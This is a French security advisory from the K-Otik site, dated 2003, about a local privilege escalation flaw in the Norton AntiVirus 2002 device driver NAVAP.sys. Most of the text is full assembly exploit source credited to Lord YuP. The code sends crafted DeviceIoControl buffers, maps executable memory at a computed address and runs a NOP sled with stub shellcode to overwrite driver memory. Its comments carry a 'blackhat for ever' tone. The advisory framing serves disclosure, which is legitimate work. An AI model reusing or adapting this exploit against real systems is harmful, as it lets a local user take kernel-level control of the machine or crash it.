Symantec Norton AntiVirus Device Driver Privilege Escalation

 Date de Publication: 2003-08-06
 Titre: Symantec Norton AntiVirus Device Driver Privilege Escalation
 K-Otik ID : 0286
 Exploitable à distance : Non
 Exploitable en local : Oui

 * Description Technique - Exploit *
Une vulnérabilité a été identifiée dans Symantec Norton AntiVirus, elle pourrait être exploitée par un utilisateur local afin d'élever ses privilèges ou encore crasher le système. Cette faille est causée par une erreur dans Norton AntiVirus Device Driver ("NAVAP.sys"), ce qui peut être exploité en envoyant deux codes de contrôles spécifiques en utilisant la fonction "DeviceIoControl()".

; NAVAP (Norton Ant
iVirus Device Driver Exploit)
; powered by Lord YuP / Sec-Labs ^ Tkt

;compile with:
;tasm32 /m1 /m3 /mx NAVAP_EXPLOIT,,;
;tlink32 -Tpe -aa NAVAP_EXPLOIT,NAVAP_EXPLOIT,,import32.lib,,

include ;this can be found in zipped archive
include WIN32API.INC ;see the end of paper

;to obtain the *Device Loaded Address* !!!!
;or make your own obtainer using SETUPAPI functions!!!

MAP_BASE equ 0bbf30000h ;0bbef4000h

;calculate the address for the shellcode
mov eax,MAP_BASE
add eax,3098eh ;first case-if offset without base addr
mov dword ptr [my_address],eax ;fill the variable
mov dword ptr [my_address+2],0 ;like NAVAP does X-D
mov dword ptr [my_address+2],32h ;guess what ;)

push 0
push 80h
push 3
push 0
push 0
push 0
@pushsz "\\.\NAVAP" ;open the device
@callx CreateFileA ;yeah - open it!
mov ebx,eax ;EBX=DEVICE HANDLE

cmp eax,-1 ;error ;/
jne _x00 ;if not jump to _x00 label

@debug SPLOIT_TITLE,"Cannot open device ;/",IERROR
jmp exit

push 0 ;overlapped = 0
push offset byte_ret ;bytes returned
push 4h ;navap requires 4 bytes ;)
push offset outer ;output buffor
push 20h ;if else our signal will be ignored
push offset my_buffer ;input buffer (symantec style)
push 222a87h ;secret code X-D
push ebx ;EBX=HANDLE
@callx DeviceIoControl ;send first signal
test eax,eax ;cannot send it ;/ - damn
jnz _x01 ;if correct jump to _x01

@debug SPLOIT_TITLE,"Cannot send 1st SIGNAL! ;/",IERROR
jmp exit

push PAGE_EXECUTE_READWRITE ;page for execute/read/write
push MEM_COMMIT ;commit
push shellcode_size+100+(1000h+10h) ;size X-D hehe
push dword ptr [my_address] ;specyfic address
@callx VirtualAlloc ;alloc it!
mov dword ptr [mem_handle],eax ;store to variable

test eax,eax ;error?
jnz _xO ;if not jump to _xO

@debug SPLOIT_TITLE,"Cannot alloc memory! ;/",IERROR
jmp exit

mov edi,eax ;EDI=MEMORY HANDLE
push edi ;store EDI
add eax,shellcode_size+10 ;after shellcode
mov dword ptr [wpisz_tutaj],eax ;store for later

xor eax,eax ;EAX=0
mov ecx,shellcode_size+100 ;ECX=SHELLCODE SIZE + 100 bytes
rep stosb ;fill up with NULL's
pop edi ;load EDI (now EDI memory handle)

lea esi,my_buffer2 ;ESI=POINTER TO SECOND BUFFER
mov ecx,my_buffer2_size ;ECX=SECOND BUFFER SIZE
rep movsb ;write it!!!

mov al,90h ;AL=90H=NOP
mov ecx,1000h+10h ;ECX=1010h bytes

add esi,my_buffer2_size ;(WITHOUT MY_BUFFER2 DATA)
mov ecx,shellcode_size-my_buffer2_size ;ECX=REAL SHELLCODE SIZE
rep movsb ;store it!

mov eax,dword ptr [mem_handle] ;EAX=MEMORY HANDLE
add eax,shellcode_size+10 ;calculate pointer for bytes_returned

push 0
push eax ;bytes returned
push 4h ;look up for comments! X-D
push eax
push 20h
push dword ptr [mem_handle]
push 222a87h
push ebx
@callx DeviceIoControl ;send second signal and execute the jump X-D
test eax,eax ;error
jnz _x02 ;nope conitnue work at _x02 label

@debug SPLOIT_TITLE,"Cannot send 2nd SIGNAL! ;/",IERROR
jmp exit

push MEM_RELEASE ;memory will be released
push shellcode_size+100+(1000h+10h) ;memory size
push dword ptr [mem_handle] ;memory handle
@callx VirtualFree ;de-allocate it

exit: push 0 ;say good bye ;)
@callx ExitProcess

byte_ret dd 0

OVERWRITE_IT equ MAP_BASE+20b12h+2 ;address to overwrite
SAFE_EXIT equ MAP_BASE+20B0Bh ;do not fault ;][;

dd 03E3E5352h ;some MARKER by symantec
dd 07h+1 ;case if
dd "nie1" ;doesn't metter in this case
dd "nie2" ;-//-
dd offset nie3 ;device must store sth (avoid fault)
dd 32h ;must be 32h!!! (read the white-paper)
dd OVERWRITE_IT ;address we want to overwrite (EDX)
dd 03C3C5352h ;the same as the first one
my_buffer_size=$-offset my_buffer

dd 03E3E5352h
dd 0h+1 ;case if
dd "nie1" ;rest the same X-D
dd "nie2"
dd offset nie3
dd 32h
wpisz_tutaj dd 0
dd 03C3C5352h
my_buffer2_size=$-offset my_buffer
db 100 dup (90h)

;here the sample shellcode starts:
;If u want write a shellcode do it yourself, avoiding from ex-ploit-k1dd13z
;blackhat for ever man ;]
;btw. remeber that IT IS A: *D - R - I - V - E - R *

@delta2reg ebp

mov edx,SAFE_EXIT
jmp edx

shellcode_size=$-offset shellcode

;the rest of variables

mem_handle dd 0
my_address dd 0
temp_erufka dd 0
nie3 db "just an temp ... "
outer db 100 dup (0)

end start

 * Versions Vulnérables *

Norton AntiVirus 2002

  * Solution *
N'autoriser l'accès qu'a des utilisateurs de confiance.

  * Références *

  * Crédits *
Faille découverte par Lord YuP (Août 2003).


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